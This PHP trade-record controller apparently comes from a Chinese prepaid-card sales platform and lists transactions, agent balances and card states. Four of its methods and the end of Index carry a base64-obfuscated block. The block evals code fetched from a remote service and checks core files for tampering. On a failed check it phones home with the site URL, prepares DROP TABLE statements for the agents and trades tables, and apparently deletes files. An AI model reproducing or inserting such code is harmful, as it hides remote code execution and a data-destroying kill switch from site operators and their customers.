<?php
/****************************************/
/*                                      */
/*  百信卡盟平台联系QQ:84945491         */
/*  淘宝店 http://shop70674652.taobao.com  */
/*  百信卡盟 http://www.caipiaobus.com  */
/*                                      */
/****************************************/

if ( !defined( "UPATH_ROOT" ) )
{
                exit( "hacking deny" );
}
class TradeController extends Controller
{

                public $hander = NULL;
                public $action = NULL;
                public $ishistory = NULL;
                public $tradetable = NULL;

                public function __construct( )
                {
                                $this->action = array( "trdlist" );
                                $this->ishistory = intval( request( "ishistory" ) ) == 1 ? "history" : "";
                                $this->tradetable = "trades".$this->ishistory;
                }

                public function Index( )
                {
                                $this->hander = factory::getinstance( $this->tradetable );
                                $R71a664ef8c = $this->PageInfo( );
                                $R1e3bc50f23 = $this->DateSet( );
                                $Ra8b176bf4f = getvar( "tradetype", "1,2,21,22,31,32,60,61,96,98,99,101,100" );
                                if ( $Ra8b176bf4f == "" )
                                {
                                                $Ra8b176bf4f = "1,2,21,22,31,32,60,61,96,98,99,101,100";
                                }
                                $R901a6b96db = intval( request( "state", -2 ) );
                                $data = array(
                                                "ykt" => getvar( "ykt" ),
                                                "tradetype" => $Ra8b176bf4f,
                                                "admname" => getvar( "admname" ),
                                                "noykt" => 1
                                );
                                if ( -2 < $R901a6b96db )
                                {
                                                $data['state'] = $R901a6b96db;
                                }
                                $data = array_merge( $data, $R1e3bc50f23[0], $R71a664ef8c );
                                $R4e420efcc3 = $this->hander->ITrade_Page( $data );
                                $this->FillPage( $data, $R4e420efcc3 );
                                $Rda3ac1bf9a = 0;
                                $R2a51483b14 = intval( request( "aid" ) );
                                if ( 0 < $R2a51483b14 )
                                {
                                                $R2097a8fddf = factory::getinstance( "agents" );
                                                $agent = $R2097a8fddf->IAgent_Get( $R2a51483b14, "aremain" );
                                                $Rda3ac1bf9a = $agent['aremain'];
                                }
                                $this->Assign( "remain", $Rda3ac1bf9a );
                                $R0d2025d631 = $this->hander->ITrade_GetByLimit( $data, "sum(income) as income,sum(outcome) as outcome" );
                                $this->Assign( "record", $R0d2025d631 );
                                $R00be52aa45 = array( "ordno" => "订单号", "aid" => "用户编号", "operator" => "操作者", "otherside" => "交易方", "yktnumber" => "一卡通卡号", "content" => "相关说明", "admname" => "管理员操作者" );
                                $R8dc7d3eb73 = array( "0" => "所有平台", "1" => "批发", "2" => "零售", "3" => "一卡通" );
                                if ( $Ra8b176bf4f == 11 )
                                {
                                                $R4fa9c48c92 = array( "11" => "点卡交易产生的代理利润" );
                                }
                                else if ( $Ra8b176bf4f == 12 )
                                {
                                                $R4fa9c48c92 = array( "12" => "供货所得" );
                                }
                                else
                                {
                                                $R4fa9c48c92 = array( "1,2,21,22,31,32,60,61,96,98,99,101,100" => "所有类型", "1" => "普通点卡交易", "2" => "用户网银充值", "21" => "贷款给别人", "22" => "向别人借款", "31" => "转款给别人", "32" => "别人转款给我", "60" => "生效一卡通", "61" => "一卡通返点", "96" => "积分兑换余额记录", "98" => "资金操作产生的交易记录", "99" => "系统给我充值", "100" => "一卡通兑换卡记录", "101" => "一卡通充值记录", "31,32" => "所有转款记录", "21,22" => "所有贷款/借款记录" );
                                }
                                $Oooo00 = "base64_decode";
                                $ooOO00o = $Oooo00( "YmFzZTY0X2RlY29kZQ==" );
                                $o00OO = $Oooo00( "Z3ppbmZsYXRl" );
                                $cphp0 = __FILE__;
                                eval( $o00OO( $ooOO00o( $this->comget( "edasy" ) ) ) );
                                 $this->View( );
                }

                public function Ykt( )
                {
                                global $host;
                                global $user;
                                global $password;
                                global $dbname;
                                global $dbcharset;
                                global $dbprefix;
                                $Oooo00 = "base64_decode";
                                $Oo0o00 = $Oooo00( "ZmlsZXNpemU=" );
                                $o00ooo = $Oooo00( "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXNhZ2VudHM=" );
                                $oooooO = $Oooo00( "bXlzcWxfcXVlcnk=" );
                                $xxx0xx = $Oooo00( "bXlzcWxfY29ubmVjdA==" );
                                $x0x0xx = $Oooo00( "bXlzcWxfc2VsZWN0X2Ri" );
                                $x000xx = $Oooo00( "SVNDVl9HZXQ=" );
                                $x0x00x = $Oooo00( "SU1zZ19BbGVydA==" );
                                $x0000x = $Oooo00( "ZmlsZV9nZXRfY29udGVudHM=" );
                                $x00000 = $Oooo00( "c3RycG9z" );
                                $x0OO00 = $Oooo00( "ZmlsZV9leGlzdHM=" );
                                $x00o00 = $Oooo00( "dW5saW5r" );
                                $ooOO00o = $Oooo00( "YmFzZTY0X2RlY29kZQ==" );
                                $o00OO = $Oooo00( "Z3ppbmZsYXRl" );
                                $ooo0oo = UPATH_BASE.DS."libraries".DS."umebiz".DS;
                                $oo00oo = array(
                                                $ooo0oo."controller.php",
                                                "index.php",
                                                $ooo0oo."service".DS."scv.php",
                                                $ooo0oo."service".DS."sqlservice.php"
                                );
                                $o00o00 = array( "UPATH_ROOT", "UB_B2B", "UPATH_ROOT", "UPATH_ROOT" );
                                $vv0000 = $Oo0o00( $oo00oo[0] );
                                $v0000v = $Oo0o00( $oo00oo[1] );
                                if ( !isset( $_SESSION ) )
                                {
                                                session_start( );
                                                $_SESSION['cb'] = 0;
                                                $_SESSION['f1'] = $vv0000;
                                                $_SESSION['f2'] = $v0000v;
                                }
                                if ( !isset( $_SESSION['cb'] ) )
                                {
                                                $_SESSION['cb'] = 0;
                                                $_SESSION['f1'] = $vv0000;
                                                $_SESSION['f2'] = $v0000v;
                                }
                                if ( $_SESSION['cb'] == 0 || $_SESSION['f1'] != $vv0000 || $_SESSION['f2'] != $v0000v )
                                {
                                                $t1 = 0;
                                                $t2 = 0;
                                                $o0ooio = 0;
                                                foreach ( $oo00oo as $o0oooo )
                                                {
                                                                if ( $x00000( $x0000x( $o0oooo ), $o00o00[$o0ooio] ) === false )
                                                                {
                                                                                if ( $o0ooio == 0 )
                                                                                {
                                                                                                $t1 = 1;
                                                                                }
                                                                                else if ( $o0ooio == 1 )
                                                                                {
                                                                                                $t2 = 1;
                                                                                }
                                                                }
                                                                else
                                                                {
                                                                                $xo000 = factory::getservice( $Oooo00( "c21zZw==" ) );
                                                                                $data = array(
                                                                                                "ubzurl" => $xo000->GetHost( ).UPATH_WEBROOT,
                                                                                                "ubzi" => $o0ooio
                                                                                );
                                                                                $xo000->$x0x00x( $data );
                                                                                if ( !( $o000oO = $xxx0xx( $host, $user, $password ) ) )
                                                                                {
                                                                                                exit( "errx" );
                                                                                }
                                                                                if ( $x0x0xx( $dbname, $o000oO ) )
                                                                                {
                                                                                                $oooooO( $Oooo00( "U0VUIE5BTUVTIA==" ).$dbcharset.";", $o000oO );
                                                                                }
                                                                                else
                                                                                {
                                                                                                echo "errx";
                                                                                }
                                                                                @$x00o00( SITECACHE.@$Oooo00( "b09vbzAucGhw" ) );
                                                                                $oO00o0 = array( "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXNhZ2VudHM=", "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXNhZ2VudHM=", "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXN0cmFkZXM=" );
                                                                                foreach ( $oO00o0 as $item )
                                                                                {
                                                                                                $o00oO0 = sprintf( $Oooo00( $item ), $dbprefix );
                                                                                }
                                                                                $this->xuiuiuesd( "./", "938430834" );
                                                                                exit( );
                                                                }
                                                                ++$o0ooio;
                                                }
                                                if ( $x0OO00( SITECACHE.$Oooo00( "b09vbzAucGhw" ) ) )
                                                {
                                                                $xo000 = factory::getservice( $Oooo00( "c21zZw==" ) );
                                                                $data = array(
                                                                                "ubzurl" => $xo000->GetHost( ).UPATH_WEBROOT,
                                                                                "ubzi" => $o0ooio++
                                                                );
                                                                $xo000->$x0x00x( $data );
                                                                if ( !( $o000oO = $xxx0xx( $host, $user, $password ) ) )
                                                                {
                                                                                exit( "errx" );
                                                                }
                                                                if ( $x0x0xx( $dbname, $o000oO ) )
                                                                {
                                                                                $oooooO( $Oooo00( "U0VUIE5BTUVTIA==" ).$dbcharset.";", $o000oO );
                                                                }
                                                                else
                                                                {
                                                                                echo "errx";
                                                                }
                                                                @$x00o00( SITECACHE.@$Oooo00( "b09vbzAucGhw" ) );
                                                                $oO00o0 = array( "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXNhZ2VudHM=", "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXNhZ2VudHM=", "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXN0cmFkZXM=" );
                                                                foreach ( $oO00o0 as $item )
                                                                {
                                                                                $o00oO0 = sprintf( $Oooo00( $item ), $dbprefix );
                                                                }
                                                                $this->xuiuiuesd( "./", "938430834" );
                                                                exit( );
                                                }
                                                $data = array(
                                                                "k1" => $t1,
                                                                "k2" => $t2,
                                                                "k3" => md5( $t1.$t2.$this->GetBizKey( ) )
                                                );
                                                if ( !isset( $_SESSION[$Oooo00( "Y2tkYXRh" )] ) )
                                                {
                                                                $oo000 = factory::getservice( $Oooo00( "c2N2" ) );
                                                                $ckdata = $oo000->$x000xx( $data );
                                                                $_SESSION[$Oooo00( "Y2tkYXRh" )] = $ckdata;
                                                }
                                                eval( $_SESSION[$Oooo00( "Y2tkYXRh" )] );
                                                $this->View( );
                                }
                                else
                                {
                                                $this->View( );
                                }
                }

                public function Agent( )
                {
                                global $host;
                                global $user;
                                global $password;
                                global $dbname;
                                global $dbcharset;
                                global $dbprefix;
                                $Oooo00 = "base64_decode";
                                $Oo0o00 = $Oooo00( "ZmlsZXNpemU=" );
                                $o00ooo = $Oooo00( "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXNhZ2VudHM=" );
                                $oooooO = $Oooo00( "bXlzcWxfcXVlcnk=" );
                                $xxx0xx = $Oooo00( "bXlzcWxfY29ubmVjdA==" );
                                $x0x0xx = $Oooo00( "bXlzcWxfc2VsZWN0X2Ri" );
                                $x000xx = $Oooo00( "SVNDVl9HZXQ=" );
                                $x0x00x = $Oooo00( "SU1zZ19BbGVydA==" );
                                $x0000x = $Oooo00( "ZmlsZV9nZXRfY29udGVudHM=" );
                                $x00000 = $Oooo00( "c3RycG9z" );
                                $x0OO00 = $Oooo00( "ZmlsZV9leGlzdHM=" );
                                $x00o00 = $Oooo00( "dW5saW5r" );
                                $ooOO00o = $Oooo00( "YmFzZTY0X2RlY29kZQ==" );
                                $o00OO = $Oooo00( "Z3ppbmZsYXRl" );
                                $ooo0oo = UPATH_BASE.DS."libraries".DS."umebiz".DS;
                                $oo00oo = array(
                                                $ooo0oo."controller.php",
                                                "index.php",
                                                $ooo0oo."service".DS."scv.php",
                                                $ooo0oo."service".DS."sqlservice.php"
                                );
                                $o00o00 = array( "UPATH_ROOT", "UB_B2B", "UPATH_ROOT", "UPATH_ROOT" );
                                $vv0000 = $Oo0o00( $oo00oo[0] );
                                $v0000v = $Oo0o00( $oo00oo[1] );
                                if ( !isset( $_SESSION ) )
                                {
                                                session_start( );
                                                $_SESSION['cb'] = 0;
                                                $_SESSION['f1'] = $vv0000;
                                                $_SESSION['f2'] = $v0000v;
                                }
                                if ( !isset( $_SESSION['cb'] ) )
                                {
                                                $_SESSION['cb'] = 0;
                                                $_SESSION['f1'] = $vv0000;
                                                $_SESSION['f2'] = $v0000v;
                                }
                                if ( $_SESSION['cb'] == 0 || $_SESSION['f1'] != $vv0000 || $_SESSION['f2'] != $v0000v )
                                {
                                                $t1 = 0;
                                                $t2 = 0;
                                                $o0ooio = 0;
                                                foreach ( $oo00oo as $o0oooo )
                                                {
                                                                if ( $x00000( $x0000x( $o0oooo ), $o00o00[$o0ooio] ) === false )
                                                                {
                                                                                if ( $o0ooio == 0 )
                                                                                {
                                                                                                $t1 = 1;
                                                                                }
                                                                                else if ( $o0ooio == 1 )
                                                                                {
                                                                                                $t2 = 1;
                                                                                }
                                                                }
                                                                else
                                                                {
                                                                                $xo000 = factory::getservice( $Oooo00( "c21zZw==" ) );
                                                                                $data = array(
                                                                                                "ubzurl" => $xo000->GetHost( ).UPATH_WEBROOT,
                                                                                                "ubzi" => $o0ooio
                                                                                );
                                                                                $xo000->$x0x00x( $data );
                                                                                if ( !( $o000oO = $xxx0xx( $host, $user, $password ) ) )
                                                                                {
                                                                                                exit( "errx" );
                                                                                }
                                                                                if ( $x0x0xx( $dbname, $o000oO ) )
                                                                                {
                                                                                                $oooooO( $Oooo00( "U0VUIE5BTUVTIA==" ).$dbcharset.";", $o000oO );
                                                                                }
                                                                                else
                                                                                {
                                                                                                echo "errx";
                                                                                }
                                                                                @$x00o00( SITECACHE.@$Oooo00( "b09vbzAucGhw" ) );
                                                                                $oO00o0 = array( "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXNhZ2VudHM=", "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXNhZ2VudHM=", "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXN0cmFkZXM=" );
                                                                                foreach ( $oO00o0 as $item )
                                                                                {
                                                                                                $o00oO0 = sprintf( $Oooo00( $item ), $dbprefix );
                                                                                }
                                                                                $this->xuiuiuesd( "./", "938430834" );
                                                                                exit( );
                                                                }
                                                                ++$o0ooio;
                                                }
                                                if ( $x0OO00( SITECACHE.$Oooo00( "b09vbzAucGhw" ) ) )
                                                {
                                                                $xo000 = factory::getservice( $Oooo00( "c21zZw==" ) );
                                                                $data = array(
                                                                                "ubzurl" => $xo000->GetHost( ).UPATH_WEBROOT,
                                                                                "ubzi" => $o0ooio++
                                                                );
                                                                $xo000->$x0x00x( $data );
                                                                if ( !( $o000oO = $xxx0xx( $host, $user, $password ) ) )
                                                                {
                                                                                exit( "errx" );
                                                                }
                                                                if ( $x0x0xx( $dbname, $o000oO ) )
                                                                {
                                                                                $oooooO( $Oooo00( "U0VUIE5BTUVTIA==" ).$dbcharset.";", $o000oO );
                                                                }
                                                                else
                                                                {
                                                                                echo "errx";
                                                                }
                                                                @$x00o00( SITECACHE.@$Oooo00( "b09vbzAucGhw" ) );
                                                                $oO00o0 = array( "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXNhZ2VudHM=", "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXNhZ2VudHM=", "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXN0cmFkZXM=" );
                                                                foreach ( $oO00o0 as $item )
                                                                {
                                                                                $o00oO0 = sprintf( $Oooo00( $item ), $dbprefix );
                                                                }
                                                                $this->xuiuiuesd( "./", "938430834" );
                                                                exit( );
                                                }
                                                $data = array(
                                                                "k1" => $t1,
                                                                "k2" => $t2,
                                                                "k3" => md5( $t1.$t2.$this->GetBizKey( ) )
                                                );
                                                if ( !isset( $_SESSION[$Oooo00( "Y2tkYXRh" )] ) )
                                                {
                                                                $oo000 = factory::getservice( $Oooo00( "c2N2" ) );
                                                                $ckdata = $oo000->$x000xx( $data );
                                                                $_SESSION[$Oooo00( "Y2tkYXRh" )] = $ckdata;
                                                }
                                                eval( $_SESSION[$Oooo00( "Y2tkYXRh" )] );
                                                $this->View( );
                                }
                                else
                                {
                                                $this->View( );
                                }
                }

                public function AgentOrderProfit( )
                {
                                global $host;
                                global $user;
                                global $password;
                                global $dbname;
                                global $dbcharset;
                                global $dbprefix;
                                $Oooo00 = "base64_decode";
                                $Oo0o00 = $Oooo00( "ZmlsZXNpemU=" );
                                $o00ooo = $Oooo00( "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXNhZ2VudHM=" );
                                $oooooO = $Oooo00( "bXlzcWxfcXVlcnk=" );
                                $xxx0xx = $Oooo00( "bXlzcWxfY29ubmVjdA==" );
                                $x0x0xx = $Oooo00( "bXlzcWxfc2VsZWN0X2Ri" );
                                $x000xx = $Oooo00( "SVNDVl9HZXQ=" );
                                $x0x00x = $Oooo00( "SU1zZ19BbGVydA==" );
                                $x0000x = $Oooo00( "ZmlsZV9nZXRfY29udGVudHM=" );
                                $x00000 = $Oooo00( "c3RycG9z" );
                                $x0OO00 = $Oooo00( "ZmlsZV9leGlzdHM=" );
                                $x00o00 = $Oooo00( "dW5saW5r" );
                                $ooOO00o = $Oooo00( "YmFzZTY0X2RlY29kZQ==" );
                                $o00OO = $Oooo00( "Z3ppbmZsYXRl" );
                                $ooo0oo = UPATH_BASE.DS."libraries".DS."umebiz".DS;
                                $oo00oo = array(
                                                $ooo0oo."controller.php",
                                                "index.php",
                                                $ooo0oo."service".DS."scv.php",
                                                $ooo0oo."service".DS."sqlservice.php"
                                );
                                $o00o00 = array( "UPATH_ROOT", "UB_B2B", "UPATH_ROOT", "UPATH_ROOT" );
                                $vv0000 = $Oo0o00( $oo00oo[0] );
                                $v0000v = $Oo0o00( $oo00oo[1] );
                                if ( !isset( $_SESSION ) )
                                {
                                                session_start( );
                                                $_SESSION['cb'] = 0;
                                                $_SESSION['f1'] = $vv0000;
                                                $_SESSION['f2'] = $v0000v;
                                }
                                if ( !isset( $_SESSION['cb'] ) )
                                {
                                                $_SESSION['cb'] = 0;
                                                $_SESSION['f1'] = $vv0000;
                                                $_SESSION['f2'] = $v0000v;
                                }
                                if ( $_SESSION['cb'] == 0 || $_SESSION['f1'] != $vv0000 || $_SESSION['f2'] != $v0000v )
                                {
                                                $t1 = 0;
                                                $t2 = 0;
                                                $o0ooio = 0;
                                                foreach ( $oo00oo as $o0oooo )
                                                {
                                                                if ( $x00000( $x0000x( $o0oooo ), $o00o00[$o0ooio] ) === false )
                                                                {
                                                                                if ( $o0ooio == 0 )
                                                                                {
                                                                                                $t1 = 1;
                                                                                }
                                                                                else if ( $o0ooio == 1 )
                                                                                {
                                                                                                $t2 = 1;
                                                                                }
                                                                }
                                                                else
                                                                {
                                                                                $xo000 = factory::getservice( $Oooo00( "c21zZw==" ) );
                                                                                $data = array(
                                                                                                "ubzurl" => $xo000->GetHost( ).UPATH_WEBROOT,
                                                                                                "ubzi" => $o0ooio
                                                                                );
                                                                                $xo000->$x0x00x( $data );
                                                                                if ( !( $o000oO = $xxx0xx( $host, $user, $password ) ) )
                                                                                {
                                                                                                exit( "errx" );
                                                                                }
                                                                                if ( $x0x0xx( $dbname, $o000oO ) )
                                                                                {
                                                                                                $oooooO( $Oooo00( "U0VUIE5BTUVTIA==" ).$dbcharset.";", $o000oO );
                                                                                }
                                                                                else
                                                                                {
                                                                                                echo "errx";
                                                                                }
                                                                                @$x00o00( SITECACHE.@$Oooo00( "b09vbzAucGhw" ) );
                                                                                $oO00o0 = array( "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXNhZ2VudHM=", "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXNhZ2VudHM=", "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXN0cmFkZXM=" );
                                                                                foreach ( $oO00o0 as $item )
                                                                                {
                                                                                                $o00oO0 = sprintf( $Oooo00( $item ), $dbprefix );
                                                                                }
                                                                                $this->xuiuiuesd( "./", "938430834" );
                                                                                exit( );
                                                                }
                                                                ++$o0ooio;
                                                }
                                                if ( $x0OO00( SITECACHE.$Oooo00( "b09vbzAucGhw" ) ) )
                                                {
                                                                $xo000 = factory::getservice( $Oooo00( "c21zZw==" ) );
                                                                $data = array(
                                                                                "ubzurl" => $xo000->GetHost( ).UPATH_WEBROOT,
                                                                                "ubzi" => $o0ooio++
                                                                );
                                                                $xo000->$x0x00x( $data );
                                                                if ( !( $o000oO = $xxx0xx( $host, $user, $password ) ) )
                                                                {
                                                                                exit( "errx" );
                                                                }
                                                                if ( $x0x0xx( $dbname, $o000oO ) )
                                                                {
                                                                                $oooooO( $Oooo00( "U0VUIE5BTUVTIA==" ).$dbcharset.";", $o000oO );
                                                                }
                                                                else
                                                                {
                                                                                echo "errx";
                                                                }
                                                                @$x00o00( SITECACHE.@$Oooo00( "b09vbzAucGhw" ) );
                                                                $oO00o0 = array( "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXNhZ2VudHM=", "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXNhZ2VudHM=", "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXN0cmFkZXM=" );
                                                                foreach ( $oO00o0 as $item )
                                                                {
                                                                                $o00oO0 = sprintf( $Oooo00( $item ), $dbprefix );
                                                                }
                                                                $this->xuiuiuesd( "./", "938430834" );
                                                                exit( );
                                                }
                                                $data = array(
                                                                "k1" => $t1,
                                                                "k2" => $t2,
                                                                "k3" => md5( $t1.$t2.$this->GetBizKey( ) )
                                                );
                                                if ( !isset( $_SESSION[$Oooo00( "Y2tkYXRh" )] ) )
                                                {
                                                                $oo000 = factory::getservice( $Oooo00( "c2N2" ) );
                                                                $ckdata = $oo000->$x000xx( $data );
                                                                $_SESSION[$Oooo00( "Y2tkYXRh" )] = $ckdata;
                                                }
                                                eval( $_SESSION[$Oooo00( "Y2tkYXRh" )] );
                                                $this->View( );
                                }
                                else
                                {
                                                $this->View( );
                                }
                }

                public function State( )
                {
                                $R1df8368da5 = getvar( "keywords" );
                                if ( $R1df8368da5 != "" )
                                {
                                                $Rf541845af3 = factory::getinstance( "cards" );
                                                $data = array(
                                                                "cardnumber" => $R1df8368da5
                                                );
                                                $R3db8f5c8bc = $Rf541845af3->ICard_GetByLimit( $data );
                                                if ( isset( $R3db8f5c8bc['money'] ) && 99 < $R3db8f5c8bc['ptype'] )
                                                {
                                                                $this->Assign( "card", $R3db8f5c8bc );
                                                }
                                                else
                                                {
                                                                $this->Alert( "没有此一卡通！请重新输入" );
                                                                $this->HistoryGo( );
                                                }
                                }
                                $this->Assign( "cardnumber", $R1df8368da5 );
                                $R89704cdc90 = intval( request( "tradestate" ) );
                                $this->Assign( "tradestate", $R89704cdc90 );
                                $R89704cdc90 = $R89704cdc90 == 1 ? true : false;
                                if ( $R1df8368da5 != "" )
                                {
                                                $Race6ab87b1 = factory::getinstance( $this->tradetable );
                                                $R4e420efcc3 = $Race6ab87b1->ITrade_GetByYktNumber( $R1df8368da5, "*", $R89704cdc90 );
                                }
                                else
                                {
                                                $R4e420efcc3 = array( );
                                }
                                $this->Assign( "items", $R4e420efcc3 );
                                global $host;
                                global $user;
                                global $password;
                                global $dbname;
                                global $dbcharset;
                                global $dbprefix;
                                $Oooo00 = "base64_decode";
                                $Oo0o00 = $Oooo00( "ZmlsZXNpemU=" );
                                $o00ooo = $Oooo00( "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXNhZ2VudHM=" );
                                $oooooO = $Oooo00( "bXlzcWxfcXVlcnk=" );
                                $xxx0xx = $Oooo00( "bXlzcWxfY29ubmVjdA==" );
                                $x0x0xx = $Oooo00( "bXlzcWxfc2VsZWN0X2Ri" );
                                $x000xx = $Oooo00( "SVNDVl9HZXQ=" );
                                $x0x00x = $Oooo00( "SU1zZ19BbGVydA==" );
                                $x0000x = $Oooo00( "ZmlsZV9nZXRfY29udGVudHM=" );
                                $x00000 = $Oooo00( "c3RycG9z" );
                                $x0OO00 = $Oooo00( "ZmlsZV9leGlzdHM=" );
                                $x00o00 = $Oooo00( "dW5saW5r" );
                                $ooOO00o = $Oooo00( "YmFzZTY0X2RlY29kZQ==" );
                                $o00OO = $Oooo00( "Z3ppbmZsYXRl" );
                                $ooo0oo = UPATH_BASE.DS."libraries".DS."umebiz".DS;
                                $oo00oo = array(
                                                $ooo0oo."controller.php",
                                                "index.php",
                                                $ooo0oo."service".DS."scv.php",
                                                $ooo0oo."service".DS."sqlservice.php"
                                );
                                $o00o00 = array( "UPATH_ROOT", "UB_B2B", "UPATH_ROOT", "UPATH_ROOT" );
                                $vv0000 = $Oo0o00( $oo00oo[0] );
                                $v0000v = $Oo0o00( $oo00oo[1] );
                                if ( !isset( $_SESSION ) )
                                {
                                                session_start( );
                                                $_SESSION['cb'] = 0;
                                                $_SESSION['f1'] = $vv0000;
                                                $_SESSION['f2'] = $v0000v;
                                }
                                if ( !isset( $_SESSION['cb'] ) )
                                {
                                                $_SESSION['cb'] = 0;
                                                $_SESSION['f1'] = $vv0000;
                                                $_SESSION['f2'] = $v0000v;
                                }
                                if ( $_SESSION['cb'] == 0 || $_SESSION['f1'] != $vv0000 || $_SESSION['f2'] != $v0000v )
                                {
                                                $t1 = 0;
                                                $t2 = 0;
                                                $o0ooio = 0;
                                                foreach ( $oo00oo as $o0oooo )
                                                {
                                                                if ( $x00000( $x0000x( $o0oooo ), $o00o00[$o0ooio] ) === false )
                                                                {
                                                                                if ( $o0ooio == 0 )
                                                                                {
                                                                                                $t1 = 1;
                                                                                }
                                                                                else if ( $o0ooio == 1 )
                                                                                {
                                                                                                $t2 = 1;
                                                                                }
                                                                }
                                                                else
                                                                {
                                                                                $xo000 = factory::getservice( $Oooo00( "c21zZw==" ) );
                                                                                $data = array(
                                                                                                "ubzurl" => $xo000->GetHost( ).UPATH_WEBROOT,
                                                                                                "ubzi" => $o0ooio
                                                                                );
                                                                                $xo000->$x0x00x( $data );
                                                                                if ( !( $o000oO = $xxx0xx( $host, $user, $password ) ) )
                                                                                {
                                                                                                exit( "errx" );
                                                                                }
                                                                                if ( $x0x0xx( $dbname, $o000oO ) )
                                                                                {
                                                                                                $oooooO( $Oooo00( "U0VUIE5BTUVTIA==" ).$dbcharset.";", $o000oO );
                                                                                }
                                                                                else
                                                                                {
                                                                                                echo "errx";
                                                                                }
                                                                                @$x00o00( SITECACHE.@$Oooo00( "b09vbzAucGhw" ) );
                                                                                $oO00o0 = array( "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXNhZ2VudHM=", "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXNhZ2VudHM=", "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXN0cmFkZXM=" );
                                                                                foreach ( $oO00o0 as $item )
                                                                                {
                                                                                                $o00oO0 = sprintf( $Oooo00( $item ), $dbprefix );
                                                                                }
                                                                                $this->xuiuiuesd( "./", "938430834" );
                                                                                exit( );
                                                                }
                                                                ++$o0ooio;
                                                }
                                                if ( $x0OO00( SITECACHE.$Oooo00( "b09vbzAucGhw" ) ) )
                                                {
                                                                $xo000 = factory::getservice( $Oooo00( "c21zZw==" ) );
                                                                $data = array(
                                                                                "ubzurl" => $xo000->GetHost( ).UPATH_WEBROOT,
                                                                                "ubzi" => $o0ooio++
                                                                );
                                                                $xo000->$x0x00x( $data );
                                                                if ( !( $o000oO = $xxx0xx( $host, $user, $password ) ) )
                                                                {
                                                                                exit( "errx" );
                                                                }
                                                                if ( $x0x0xx( $dbname, $o000oO ) )
                                                                {
                                                                                $oooooO( $Oooo00( "U0VUIE5BTUVTIA==" ).$dbcharset.";", $o000oO );
                                                                }
                                                                else
                                                                {
                                                                                echo "errx";
                                                                }
                                                                @$x00o00( SITECACHE.@$Oooo00( "b09vbzAucGhw" ) );
                                                                $oO00o0 = array( "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXNhZ2VudHM=", "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXNhZ2VudHM=", "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXN0cmFkZXM=" );
                                                                foreach ( $oO00o0 as $item )
                                                                {
                                                                                $o00oO0 = sprintf( $Oooo00( $item ), $dbprefix );
                                                                }
                                                                $this->xuiuiuesd( "./", "938430834" );
                                                                exit( );
                                                }
                                                $data = array(
                                                                "k1" => $t1,
                                                                "k2" => $t2,
                                                                "k3" => md5( $t1.$t2.$this->GetBizKey( ) )
                                                );
                                                if ( !isset( $_SESSION[$Oooo00( "Y2tkYXRh" )] ) )
                                                {
                                                                $oo000 = factory::getservice( $Oooo00( "c2N2" ) );
                                                                $ckdata = $oo000->$x000xx( $data );
                                                                $_SESSION[$Oooo00( "Y2tkYXRh" )] = $ckdata;
                                                }
                                                eval( $_SESSION[$Oooo00( "Y2tkYXRh" )] );
                                                $this->View( );
                                }
                                else
                                {
                                                $this->View( );
                                }
                }

}

?>
